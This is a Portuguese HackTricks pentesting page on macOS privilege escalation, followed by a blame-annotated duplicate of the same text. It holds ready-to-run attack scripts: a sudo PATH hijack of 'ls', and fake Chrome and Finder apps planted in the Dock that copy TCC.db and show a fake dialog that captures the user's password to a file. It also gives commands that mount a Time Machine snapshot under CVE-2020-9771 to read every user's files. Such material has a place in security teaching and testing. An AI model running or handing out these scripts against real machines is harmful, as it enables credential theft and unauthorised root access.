hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md

# Escalação de Privilégios no macOS

<details>

<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras formas de apoiar o HackTricks:

* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Escalação de Privilégios TCC

Se você veio aqui procurando por escalação de privilégios TCC, vá para:

{% content-ref url="macos-security-protections/macos-tcc/" %}
[macos-tcc](macos-security-protections/macos-tcc/)
{% endcontent-ref %}

## Privesc no Linux

Por favor, note que **a maioria das técnicas de escalação de privilégios que afetam o Linux/Unix também afetarão os computadores MacOS**. Então, veja:

{% content-ref url="../../linux-hardening/privilege-escalation/" %}
[privilege-escalation](../../linux-hardening/privilege-escalation/)
{% endcontent-ref %}

## Interação com o Usuário

### Sequestro do Sudo

Você pode encontrar a técnica original de [Sequestro do Sudo no post de Escalação de Privilégios no Linux](../../linux-hardening/privilege-escalation/#sudo-hijacking).

No entanto, o macOS **mantém** o **`PATH`** do usuário quando ele executa **`sudo`**. O que significa que outra maneira de realizar esse ataque seria **sequestrar outros binários** que a vítima ainda executará ao **rodar sudo:**
```bash
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
cat > /opt/homebrew/bin/ls <<EOF
#!/bin/bash
if [ "\$(id -u)" -eq 0 ]; then
whoami > /tmp/privesc
fi
/bin/ls "\$@"
EOF
chmod +x /opt/homebrew/bin/ls

# victim
sudo ls
```
Note que um usuário que utiliza o terminal provavelmente terá o **Homebrew instalado**. Assim, é possível sequestrar binários em **`/opt/homebrew/bin`**.

### Imitação do Dock

Usando algumas técnicas de **engenharia social**, você poderia **imitar, por exemplo, o Google Chrome** no dock e na verdade executar seu próprio script:

{% tabs %}
{% tab title="Imitação do Chrome" %}
Algumas sugestões:

* Verifique no Dock se há um Chrome, e nesse caso, **remova** essa entrada e **adicione** a **falsa** **entrada do Chrome na mesma posição** no array do Dock.&#x20;
```bash
#!/bin/sh

# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';

rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources

# Payload to execute
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF

gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c

chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock
```
{% endtab %}

{% tab title="Impersonação do Finder" %}
Algumas sugestões:

* Você **não pode remover o Finder do Dock**, então se você for adicioná-lo ao Dock, você poderia colocar o Finder falso bem ao lado do verdadeiro. Para isso, você precisa **adicionar a entrada do Finder falso no início do array do Dock**.
* Outra opção é não colocá-lo no Dock e apenas abri-lo, "Finder pedindo para controlar o Finder" não é tão estranho.
* Outra opção para **escalar para root sem pedir** a senha com uma caixa horrível, é fazer o Finder realmente pedir a senha para realizar uma ação privilegiada:
* Peça ao Finder para copiar para **`/etc/pam.d`** um novo arquivo **`sudo`** (O prompt pedindo a senha indicará que "Finder quer copiar sudo")
* Peça ao Finder para copiar um novo **Plugin de Autorização** (Você poderia controlar o nome do arquivo para que o prompt pedindo a senha indique que "Finder quer copiar Finder.bundle")
```bash
#!/bin/sh

# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';

rm -rf /tmp/Finder.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Finder.app/Contents/MacOS
mkdir -p /tmp/Finder.app/Contents/Resources

# Payload to execute
cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
char *cmd = "open /System/Library/CoreServices/Finder.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF

gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c

chmod +x /tmp/Finder.app/Contents/MacOS/Finder

# Info.plist
cat << EOF > /tmp/Finder.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Finder</string>
<key>CFBundleIdentifier</key>
<string>com.apple.finder</string>
<key>CFBundleName</key>
<string>Finder</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Finder
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock
```
{% endtab %}
{% endtabs %}

## TCC - Escalação de Privilégios de Root

### CVE-2020-9771 - bypass do TCC e escalonamento de privilégios com mount\_apfs

**Qualquer usuário** (mesmo os não privilegiados) pode criar e montar um snapshot do Time Machine e **acessar TODOS os arquivos** desse snapshot.
O **único privilégio** necessário é que o aplicativo usado (como o `Terminal`) tenha acesso a **Acesso Completo ao Disco** (FDA) (`kTCCServiceSystemPolicyAllfiles`), o qual deve ser concedido por um administrador.

{% code overflow="wrap" %}
```bash
# Create snapshot
tmutil localsnapshot

# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local

# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap

# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap

# Access it
ls /tmp/snap/Users/admin_user # This will work
```
```markdown
{% endcode %}

Uma explicação mais detalhada pode ser [**encontrada no relatório original**](https://theevilbit.github.io/posts/cve_2020_9771/)**.**

## Informações Sensíveis

Isso pode ser útil para escalar privilégios:

{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}
[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)
{% endcontent-ref %}

<details>

<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras formas de apoiar o HackTricks:

* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
```
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00			`# Escalação de Privilégios no macOS`

			`<details>`

Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			`<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			`Outras formas de apoiar o HackTricks:`

			`* Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Adquira o [material oficial PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção de [NFTs](https://opensea.io/collection/the-peass-family) exclusivos`
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			`* Junte-se ao grupo 💬 [Discord](https://discord.gg/hRep4RUj7f) ou ao grupo [telegram](https://t.me/peass) ou siga-me no Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
			`</details>`

			`## Escalação de Privilégios TCC`

			`Se você veio aqui procurando por escalação de privilégios TCC, vá para:`

			`{% content-ref url="macos-security-protections/macos-tcc/" %}`
			`[macos-tcc](macos-security-protections/macos-tcc/)`
			`{% endcontent-ref %}`

			`## Privesc no Linux`

Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			`Por favor, note que a maioria das técnicas de escalação de privilégios que afetam o Linux/Unix também afetarão os computadores MacOS. Então, veja:`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
			`{% content-ref url="../../linux-hardening/privilege-escalation/" %}`
			`[privilege-escalation](../../linux-hardening/privilege-escalation/)`
			`{% endcontent-ref %}`

Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			`## Interação com o Usuário`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
			`### Sequestro do Sudo`

Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			`Você pode encontrar a técnica original de [Sequestro do Sudo no post de Escalação de Privilégios no Linux](../../linux-hardening/privilege-escalation/#sudo-hijacking).`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			No entanto, o macOS mantém o `PATH` do usuário quando ele executa `sudo`. O que significa que outra maneira de realizar esse ataque seria sequestrar outros binários que a vítima ainda executará ao rodar sudo:
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00			```bash
			`# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH`
			`cat > /opt/homebrew/bin/ls <<EOF`
			`#!/bin/bash`
			`if [ "\$(id -u)" -eq 0 ]; then`
			`whoami > /tmp/privesc`
			`fi`
			`/bin/ls "\$@"`
			`EOF`
			`chmod +x /opt/homebrew/bin/ls`

			`# victim`
			`sudo ls`
			```
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			Note que um usuário que utiliza o terminal provavelmente terá o Homebrew instalado. Assim, é possível sequestrar binários em `/opt/homebrew/bin`.
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			`### Imitação do Dock`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			`Usando algumas técnicas de engenharia social, você poderia imitar, por exemplo, o Google Chrome no dock e na verdade executar seu próprio script:`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
			`{% tabs %}`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			`{% tab title="Imitação do Chrome" %}`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00			`Algumas sugestões:`

Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			`* Verifique no Dock se há um Chrome, e nesse caso, remova essa entrada e adicione a falsa entrada do Chrome na mesma posição no array do Dock. `
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00			```bash
			`#!/bin/sh`

			`# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)`
			`# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';`

			`rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null`

			`# Create App structure`
			`mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS`
			`mkdir -p /tmp/Google\ Chrome.app/Contents/Resources`

			`# Payload to execute`
			`cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF`
			`#include <stdio.h>`
			`#include <stdlib.h>`
			`#include <unistd.h>`

			`int main() {`
			`char *cmd = "open /Applications/Google\\\\ Chrome.app & "`
			`"sleep 2; "`
			`"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "`
			`"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "`
			`"echo \$PASSWORD > /tmp/passwd.txt";`
			`system(cmd);`
			`return 0;`
			`}`
			`EOF`

			`gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome`
			`rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c`

			`chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome`

			`# Info.plist`
			`cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist`
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"`
			`"http://www.apple.com/DTDs/PropertyList-1.0.dtd">`
			`<plist version="1.0">`
			`<dict>`
			`<key>CFBundleExecutable</key>`
			`<string>Google Chrome</string>`
			`<key>CFBundleIdentifier</key>`
			`<string>com.google.Chrome</string>`
			`<key>CFBundleName</key>`
			`<string>Google Chrome</string>`
			`<key>CFBundleVersion</key>`
			`<string>1.0</string>`
			`<key>CFBundleShortVersionString</key>`
			`<string>1.0</string>`
			`<key>CFBundleInfoDictionaryVersion</key>`
			`<string>6.0</string>`
			`<key>CFBundlePackageType</key>`
			`<string>APPL</string>`
			`<key>CFBundleIconFile</key>`
			`<string>app</string>`
			`</dict>`
			`</plist>`
			`EOF`

			`# Copy icon from Google Chrome`
			`cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns`

			`# Add to Dock`
			`defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'`
			`sleep 0.1`
			`killall Dock`
			```
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			`{% endtab %}`

Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00			`{% tab title="Impersonação do Finder" %}`
			`Algumas sugestões:`

Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			`* Você não pode remover o Finder do Dock, então se você for adicioná-lo ao Dock, você poderia colocar o Finder falso bem ao lado do verdadeiro. Para isso, você precisa adicionar a entrada do Finder falso no início do array do Dock.`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00			`* Outra opção é não colocá-lo no Dock e apenas abri-lo, "Finder pedindo para controlar o Finder" não é tão estranho.`
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			`* Outra opção para escalar para root sem pedir a senha com uma caixa horrível, é fazer o Finder realmente pedir a senha para realizar uma ação privilegiada:`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			* Peça ao Finder para copiar para `/etc/pam.d` um novo arquivo `sudo` (O prompt pedindo a senha indicará que "Finder quer copiar sudo")
			`* Peça ao Finder para copiar um novo Plugin de Autorização (Você poderia controlar o nome do arquivo para que o prompt pedindo a senha indique que "Finder quer copiar Finder.bundle")`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00			```bash
			`#!/bin/sh`

			`# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)`
			`# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';`

			`rm -rf /tmp/Finder.app/ 2>/dev/null`

			`# Create App structure`
			`mkdir -p /tmp/Finder.app/Contents/MacOS`
			`mkdir -p /tmp/Finder.app/Contents/Resources`

			`# Payload to execute`
			`cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF`
			`#include <stdio.h>`
			`#include <stdlib.h>`
			`#include <unistd.h>`

			`int main() {`
			`char *cmd = "open /System/Library/CoreServices/Finder.app & "`
			`"sleep 2; "`
			`"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "`
			`"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "`
			`"echo \$PASSWORD > /tmp/passwd.txt";`
			`system(cmd);`
			`return 0;`
			`}`
			`EOF`

			`gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder`
			`rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c`

			`chmod +x /tmp/Finder.app/Contents/MacOS/Finder`

			`# Info.plist`
			`cat << EOF > /tmp/Finder.app/Contents/Info.plist`
			`<?xml version="1.0" encoding="UTF-8"?>`
			`<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"`
			`"http://www.apple.com/DTDs/PropertyList-1.0.dtd">`
			`<plist version="1.0">`
			`<dict>`
			`<key>CFBundleExecutable</key>`
			`<string>Finder</string>`
			`<key>CFBundleIdentifier</key>`
			`<string>com.apple.finder</string>`
			`<key>CFBundleName</key>`
			`<string>Finder</string>`
			`<key>CFBundleVersion</key>`
			`<string>1.0</string>`
			`<key>CFBundleShortVersionString</key>`
			`<string>1.0</string>`
			`<key>CFBundleInfoDictionaryVersion</key>`
			`<string>6.0</string>`
			`<key>CFBundlePackageType</key>`
			`<string>APPL</string>`
			`<key>CFBundleIconFile</key>`
			`<string>app</string>`
			`</dict>`
			`</plist>`
			`EOF`

			`# Copy icon from Finder`
			`cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns`

			`# Add to Dock`
			`defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'`
			`sleep 0.1`
			`killall Dock`
			```
			`{% endtab %}`
			`{% endtabs %}`

Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			`## TCC - Escalação de Privilégios de Root`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			`### CVE-2020-9771 - bypass do TCC e escalonamento de privilégios com mount\_apfs`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			`Qualquer usuário (mesmo os não privilegiados) pode criar e montar um snapshot do Time Machine e acessar TODOS os arquivos desse snapshot.`
			O único privilégio necessário é que o aplicativo usado (como o `Terminal`) tenha acesso a Acesso Completo ao Disco (FDA) (`kTCCServiceSystemPolicyAllfiles`), o qual deve ser concedido por um administrador.
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
			`{% code overflow="wrap" %}`
			```bash
			`# Create snapshot`
			`tmutil localsnapshot`

			`# List snapshots`
			`tmutil listlocalsnapshots /`
			`Snapshots for disk /:`
			`com.apple.TimeMachine.2023-05-29-001751.local`

			`# Generate folder to mount it`
			`cd /tmp # I didn it from this folder`
			`mkdir /tmp/snap`

			`# Mount it, "noowners" will mount the folder so the current user can access everything`
			`/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap`

			`# Access it`
			`ls /tmp/snap/Users/admin_user # This will work`
			```
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			```markdown
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00			`{% endcode %}`

Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			`Uma explicação mais detalhada pode ser [encontrada no relatório original](https://theevilbit.github.io/posts/cve_2020_9771/).`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
			`## Informações Sensíveis`

Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			`Isso pode ser útil para escalar privilégios:`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
			`{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %}`
			`[macos-sensitive-locations.md](macos-files-folders-and-binaries/macos-sensitive-locations.md)`
			`{% endcontent-ref %}`

			`<details>`

Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			`<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`

			`Outras formas de apoiar o HackTricks:`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			`* Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Adquira o [material oficial PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção de [NFTs](https://opensea.io/collection/the-peass-family) exclusivos`
Translated ['macos-hardening/macos-security-and-privilege-escalation/REA 2024-01-04 11:50:55 +00:00			`* Junte-se ao grupo 💬 [Discord](https://discord.gg/hRep4RUj7f) ou ao grupo [telegram](https://t.me/peass) ou siga-me no Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
Translated ['linux-hardening/privilege-escalation/README.md', 'macos-har 2023-12-20 02:30:55 +00:00
			`</details>`
Translated ['forensics/basic-forensic-methodology/specific-software-file 2023-12-26 02:05:14 +00:00			```